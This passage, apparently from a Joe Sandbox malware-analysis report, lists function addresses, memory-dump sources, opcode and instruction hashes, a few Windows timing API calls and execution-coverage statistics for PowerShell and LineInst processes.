                                                                                                                        • Opcode Fuzzy Hash: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                                                                                        • Instruction Fuzzy Hash: 2E01712193920285FB21BF60987A27BA3A0EF8CF48FC61035D54D426B5DE2CD5449A24

                                                                                                                        Executed Functions

                                                                                                                        Function 00007FFD9B3BA508 Relevance: .3, Instructions: 274COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cb8a847bc9046c7d596628dcc8038eb85789aae599a46734f4cf27aee7337d82
                                                                                                                        • Instruction ID: fb1a9fe7f856cfed62fd79e8f4894871a7ca856c77f88ab28339b1d8a2a170b8
                                                                                                                        • Opcode Fuzzy Hash: cb8a847bc9046c7d596628dcc8038eb85789aae599a46734f4cf27aee7337d82
                                                                                                                        • Instruction Fuzzy Hash: 5D213A7191E7C94FD7539B7448244A57FB0AF13210B0A42DBD4C4CB0F3DA685D49CB62
                                                                                                                        Function 00007FFD9B3B9715 Relevance: .2, Instructions: 171COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 82861eec54d6c18d872e06421fdb97cd30f05d084df316ccf3f49278872e78a8
                                                                                                                        • Instruction ID: 34068fa72a0606bb968fef2f25701c01d4130b51610a1a2e0bbb530bd40deab2
                                                                                                                        • Opcode Fuzzy Hash: 82861eec54d6c18d872e06421fdb97cd30f05d084df316ccf3f49278872e78a8
                                                                                                                        • Instruction Fuzzy Hash: 8F412A3191DB8C4FD718EB6898566B97BE0FF59710F00426FD089C32A2DA647846CBC2
                                                                                                                        Function 00007FFD9B3B9785 Relevance: .1, Instructions: 130COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a8f41c1d796674ccf0fdb3a3d89f99ed95497ca47b29f7a6d2ab2becbeb69f2f
                                                                                                                        • Instruction ID: f15ec787e956c344bf982d61e47d2d721b591a176ccd1dd04968d962d5fd4f5b
                                                                                                                        • Opcode Fuzzy Hash: a8f41c1d796674ccf0fdb3a3d89f99ed95497ca47b29f7a6d2ab2becbeb69f2f
                                                                                                                        • Instruction Fuzzy Hash: 9C31E63191CB8C8FDB18EF5C9C1A6A97BE0FB59720F00426FE449C3252DA75A855CBC2
                                                                                                                        Function 00007FFD9B29E620 Relevance: .1, Instructions: 128COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1850244100.00007FFD9B29D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B29D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b29d000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6730bf3e04dc16e60f71d2bc399d6e6b573047e2fd219791f62d8e699c01fecb
                                                                                                                        • Instruction ID: 518f0911124910d1c26371917dedf2df3098a1a832c56a9bbfe28953e05dfb93
                                                                                                                        • Opcode Fuzzy Hash: 6730bf3e04dc16e60f71d2bc399d6e6b573047e2fd219791f62d8e699c01fecb
                                                                                                                        • Instruction Fuzzy Hash: D041177140EBC44FE7569B39D8559523FF0EF56320B1A06DFD088CB1A3D625B84AC7A2
                                                                                                                        Function 00007FFD9B3BA878 Relevance: .1, Instructions: 104COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a4005d08aaba3170d5534c008311de6a82cb86e039aad97ae788b39ccc82aedd
                                                                                                                        • Instruction ID: 789b88a9c7473f48a2d277edae08a0a8f154cf1e3183369eb48c8d4d51accdc4
                                                                                                                        • Opcode Fuzzy Hash: a4005d08aaba3170d5534c008311de6a82cb86e039aad97ae788b39ccc82aedd
                                                                                                                        • Instruction Fuzzy Hash: 22213A3090CB4C4FDB58DFAC98467E97BE0EB9A320F04426FD048C3152DA746406CB91
                                                                                                                        Function 00007FFD9B3B33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                        • Instruction ID: d6653628ec1ea21fdb969c0c39eb1e29366706e0c56f90460c90c54dbb1c04c5
                                                                                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                        • Instruction Fuzzy Hash: 8F01A73121CB0C4FD748EF0CE051AB6B7E0FB85320F10056EE58AC36A5DA36E882CB41
                                                                                                                        Function 00007FFD9B4844CD Relevance: .0, Instructions: 37COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1853195198.00007FFD9B480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B480000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b480000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8cd6a46610ac8d3e5507860b6c07beb4257b4973f8e9a9d117e2b82df571159d
                                                                                                                        • Instruction ID: ca6cb81a2d47bf585c79877eb04cabb9d5c967219e910a6c6c46887fbf2438ed
                                                                                                                        • Opcode Fuzzy Hash: 8cd6a46610ac8d3e5507860b6c07beb4257b4973f8e9a9d117e2b82df571159d
                                                                                                                        • Instruction Fuzzy Hash: 36F03A32B0D9498FE768EA5CA4618A873E0FF4532475500BBE16DC75A7DA25EC41C780
                                                                                                                        Function 00007FFD9B485344 Relevance: .0, Instructions: 35COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1853195198.00007FFD9B480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B480000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b480000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dfbe3916a528f8fc5ff35c2d4666c28a9b6b5c6c3d5e3d56650323f9a0b53f68
                                                                                                                        • Instruction ID: d2815fd7709062ca65c1256bf6098cd653c0d1007dbb4f17886c9537feda3058
                                                                                                                        • Opcode Fuzzy Hash: dfbe3916a528f8fc5ff35c2d4666c28a9b6b5c6c3d5e3d56650323f9a0b53f68
                                                                                                                        • Instruction Fuzzy Hash: D2F0A73131CF044FD744EE1DD445661B3E0FBA8314F10452FE449C3655DA21E8818782
                                                                                                                        Function 00007FFD9B484780 Relevance: .0, Instructions: 35COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1853195198.00007FFD9B480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B480000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b480000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 49c2780cc577a687500b8111585d0388fb8fa1de998a9dc2a41c149cb58a3cd7
                                                                                                                        • Instruction ID: 236496b55026dd9df14a85d38d8d28887b6c56ab5b6deca99a22efe94d671bbf
                                                                                                                        • Opcode Fuzzy Hash: 49c2780cc577a687500b8111585d0388fb8fa1de998a9dc2a41c149cb58a3cd7
                                                                                                                        • Instruction Fuzzy Hash: DDF03A32A0D9488FE768EA58A4558A877E0EF0632575600BAE16DC74A7DA25AC40C780
                                                                                                                        Function 00007FFD9B3B9ED7 Relevance: .0, Instructions: 35COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1471f29815a81aeb6b47cc9b2eea4685c1c229fa8f01271f4937198478af14d4
                                                                                                                        • Instruction ID: 6b572fb7a89f3a1b0835e2a9e3bd6723ce53316f8625569ec8b336eda880a44e
                                                                                                                        • Opcode Fuzzy Hash: 1471f29815a81aeb6b47cc9b2eea4685c1c229fa8f01271f4937198478af14d4
                                                                                                                        • Instruction Fuzzy Hash: 62F02731508A8C4FC701EF18D8194F67FB0EF16201B0202EBE44DC7072CA219618CBC2
                                                                                                                        Function 00007FFD9B3B9ECF Relevance: .0, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: edf1361de78093a29d6fd1a958b104bbea2272506dfb884b00618db05a9c03ff
                                                                                                                        • Instruction ID: 0d1865e05e953ff6b91b769ab95ddd3667647f8061b769a98c248603fa9d7131
                                                                                                                        • Opcode Fuzzy Hash: edf1361de78093a29d6fd1a958b104bbea2272506dfb884b00618db05a9c03ff
                                                                                                                        • Instruction Fuzzy Hash: 07F05E3084D78C9FC706EF6488284B57FB0EF26200B0A42DBE44DCB072D7289918CB92
                                                                                                                        Function 00007FFD9B3B9E76 Relevance: .0, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 08000d23c00a374dda062a1b5f0e232df851c72d8799e53ecd70ba506f950928
                                                                                                                        • Instruction ID: 551ac9f8662eb7efc9055afb44761f4ea2cb8263d003433709bc6f522979ca6c
                                                                                                                        • Opcode Fuzzy Hash: 08000d23c00a374dda062a1b5f0e232df851c72d8799e53ecd70ba506f950928
                                                                                                                        • Instruction Fuzzy Hash: C2F01C3085DBCC9FCB46DF6488299A57FF0FE16210B0A42DBE44DCB172D7299958CB92

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00007FFD9B3B87F2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: M_^$M_^$M_^$M_^
                                                                                                                        • API String ID: 0-1397233021
                                                                                                                        • Opcode ID: eca77f98c810479cc52d2107122868e3463a86a7d2ce8586c417bd4d6745da68
                                                                                                                        • Instruction ID: 446b588f9e7dca14cdad7e180ca27711cf940df3c7414cec75d18fe1226235b9
                                                                                                                        • Opcode Fuzzy Hash: eca77f98c810479cc52d2107122868e3463a86a7d2ce8586c417bd4d6745da68
                                                                                                                        • Instruction Fuzzy Hash: 9F31C993A1B6D91BF766956E48B54F03FA0EF52B54B0B03FAC4E48A063FE4439074600

                                                                                                                        Executed Functions

                                                                                                                        Function 00007FFD9B3D9785 Relevance: .1, Instructions: 132COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 40431d21a4d5ce1428f29ca6942f86b24504461c9bb7072e8ba8db3cc569bb4c
                                                                                                                        • Instruction ID: fd0167c1ddb5419582f7b8cda30795e827256d268a02c51f6f64538d53e7ae52
                                                                                                                        • Opcode Fuzzy Hash: 40431d21a4d5ce1428f29ca6942f86b24504461c9bb7072e8ba8db3cc569bb4c
                                                                                                                        • Instruction Fuzzy Hash: 8F31D87191CB4C9FDB18DF5C984A6A97BE0FB59720F00426FE449C3152DA74A856CBC2
                                                                                                                        Function 00007FFD9B2BEF00 Relevance: .1, Instructions: 123COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1866204951.00007FFD9B2BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2BD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b2bd000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 27d2f2c1478af505aa08dbb92b1510ddd6343d1e7f92acb28ab337dffff2f58f
                                                                                                                        • Instruction ID: 4753ecad15f2d1248fdc53dcadc6176538a54f67e0fe5655de4fba6a0abd5f7b
                                                                                                                        • Opcode Fuzzy Hash: 27d2f2c1478af505aa08dbb92b1510ddd6343d1e7f92acb28ab337dffff2f58f
                                                                                                                        • Instruction Fuzzy Hash: BA41067180EBC44FD7569B3998559523FF0EF57320B1A05DFD088CB1A3DA29A846CBA2
                                                                                                                        Function 00007FFD9B3DA6C8 Relevance: .1, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6d964fa52e1a56265e74a1c9f511f06c1cb6d48e96127b8c841407f6366524d3
                                                                                                                        • Instruction ID: bfa7ab4cd07fc462da502719279a21b6e84338ee583a16e826ce2fd0139f63dc
                                                                                                                        • Opcode Fuzzy Hash: 6d964fa52e1a56265e74a1c9f511f06c1cb6d48e96127b8c841407f6366524d3
                                                                                                                        • Instruction Fuzzy Hash: 4A21293190CA4C8FDB58DF9CD84A7E97BE0EB96321F04426FD049C3162DA74A40ACB91
                                                                                                                        Function 00007FFD9B3D33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                        • Instruction ID: bfb36fa0363ad731f6b5ca7a7d85b04961e9e267f58d672a1290080f67e65a44
                                                                                                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                        • Instruction Fuzzy Hash: 1601677121CB0C4FD748EF4CE451AA5B7E0FB95364F10056DE58AC36A5DA36E882CB45
                                                                                                                        Function 00007FFD9B3DA508 Relevance: .0, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e13e81c938c996cceef375918b991f48441e28af0755b273c9252bb54cf8e529
                                                                                                                        • Instruction ID: ef97a1562a1f746ff41b2df3d6574c6d56b2f10c71e6201c0596d25acf8f509f
                                                                                                                        • Opcode Fuzzy Hash: e13e81c938c996cceef375918b991f48441e28af0755b273c9252bb54cf8e529
                                                                                                                        • Instruction Fuzzy Hash: E6F02B3081968D4FDB0ADF6888154D57FA0FF16350B05039BD458C71B2DB659558CB82
                                                                                                                        Function 00007FFD9B4A44CD Relevance: .0, Instructions: 37COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1868745495.00007FFD9B4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b4a0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 28da6178d5785a81dbc4528360ea8943c8e1f120f1496e11a197b8c17df2eae8
                                                                                                                        • Instruction ID: 0e3c4ac494a8c2fc12e373d65dcd38df93497e9b38ba1b9c848ed912729e14bb
                                                                                                                        • Opcode Fuzzy Hash: 28da6178d5785a81dbc4528360ea8943c8e1f120f1496e11a197b8c17df2eae8
                                                                                                                        • Instruction Fuzzy Hash: FBF05E32B0D5498FE768EA5CE4618A873E0FF4532475500BBE16DC75A7DB25EC41C780
                                                                                                                        Function 00007FFD9B3D9ED7 Relevance: .0, Instructions: 35COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0926ec818198f7ce522f4267e26b00767242ce8dc72a31be43a9c95f5f5f2396
                                                                                                                        • Instruction ID: ed11fbd3c797c56d87c64a946c86a3af2c92f193ee8fb934fcf0602330b6adb3
                                                                                                                        • Opcode Fuzzy Hash: 0926ec818198f7ce522f4267e26b00767242ce8dc72a31be43a9c95f5f5f2396
                                                                                                                        • Instruction Fuzzy Hash: C5F0273151868C4FC701EF18D8154E67FB0FF96204B0103EBE44DC7072C6219618CBC2
                                                                                                                        Function 00007FFD9B4A5014 Relevance: .0, Instructions: 35COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1868745495.00007FFD9B4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b4a0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0469b9c680061f40ec15f9ba32313a185b04c4df7bc0ed43c46ac3ce4b164a28
                                                                                                                        • Instruction ID: d2815fd7709062ca65c1256bf6098cd653c0d1007dbb4f17886c9537feda3058
                                                                                                                        • Opcode Fuzzy Hash: 0469b9c680061f40ec15f9ba32313a185b04c4df7bc0ed43c46ac3ce4b164a28
                                                                                                                        • Instruction Fuzzy Hash: D2F0A73131CF044FD744EE1DD445661B3E0FBA8314F10452FE449C3655DA21E8818782
                                                                                                                        Function 00007FFD9B4A4780 Relevance: .0, Instructions: 35COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1868745495.00007FFD9B4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b4a0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0524a9c279c333a1b88a4b58aee1a00eb995107ce2b272084e930bb15396cdc8
                                                                                                                        • Instruction ID: dd840c5cc1f58d6768b18e16e31380f7b54b7bf7fafca84b0cc5af86395c2529
                                                                                                                        • Opcode Fuzzy Hash: 0524a9c279c333a1b88a4b58aee1a00eb995107ce2b272084e930bb15396cdc8
                                                                                                                        • Instruction Fuzzy Hash: A2F03A32A0D5888FD768EA58A4558A877E0EF0632575600BAE16DC74A7DA25AC41C780
                                                                                                                        Function 00007FFD9B3D9ECF Relevance: .0, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a864a51a561283f533caca4cc3ff30b2ed758f402a4d451dec573ff28ce4306f
                                                                                                                        • Instruction ID: ab43c03a56dcdfc1b09cdfdf5d85092c7d8d8fc8b911a2e3fb8c3c6bc425488f
                                                                                                                        • Opcode Fuzzy Hash: a864a51a561283f533caca4cc3ff30b2ed758f402a4d451dec573ff28ce4306f
                                                                                                                        • Instruction Fuzzy Hash: 10F05E3081D78C8FC706EF6498284B57FB0EF66201B0A42DBE44DCB072D7259918CB92
                                                                                                                        Function 00007FFD9B3D9E76 Relevance: .0, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1867715743.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b3d0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8ddbbaefc88bb0a27d7887b53002af7ced5df8a8186c081e2bce316027c5ed49
                                                                                                                        • Instruction ID: d94f9f89ee2f138ecaa7b90b254456eb7e81f3babed41a597eb3198238c75a43
                                                                                                                        • Opcode Fuzzy Hash: 8ddbbaefc88bb0a27d7887b53002af7ced5df8a8186c081e2bce316027c5ed49
                                                                                                                        • Instruction Fuzzy Hash: 55F01C3081D7CC8FCB46DF6498298A57FF0FE56210B0A42DBE48DCB172D7299958CB92

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00AE3155 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00AE3182
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00AE3191
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AE319A
                                                                                                                        • GetTickCount.KERNEL32 ref: 00AE31A3
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00AE31B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.2919708205.0000000000A71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.2919558326.0000000000A70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.2920266011.0000000000AE9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.2920499400.0000000000AED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.2920499400.0000000000AF1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.2920499400.0000000000B00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.2920499400.0000000000B2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.2920499400.0000000000B43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.2920499400.0000000000B45000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.2920499400.0000000000B4E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.2920499400.0000000000B70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.2920499400.0000000000B7A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.2920499400.0000000000B85000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_a70000_LineInst.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1445889803-0
                                                                                                                        • Opcode ID: c4cc6dc8a3bb29d4b40ca6391afe81b27ec94ece67f44b917cc22860ea2a8d35
                                                                                                                        • Instruction ID: 83b784b7442b16ffff36296c51c81d97182c1802dbe45378f522da10807a27a2
                                                                                                                        • Opcode Fuzzy Hash: c4cc6dc8a3bb29d4b40ca6391afe81b27ec94ece67f44b917cc22860ea2a8d35
                                                                                                                        • Instruction Fuzzy Hash: B911DA71D012489FCF10DBF9EA8869EB7F6EF48315F554A59D402EB210E6309B018B40

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:10%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:0%
                                                                                                                        Total number of Nodes:2000
                                                                                                                        Total number of Limit Nodes:30
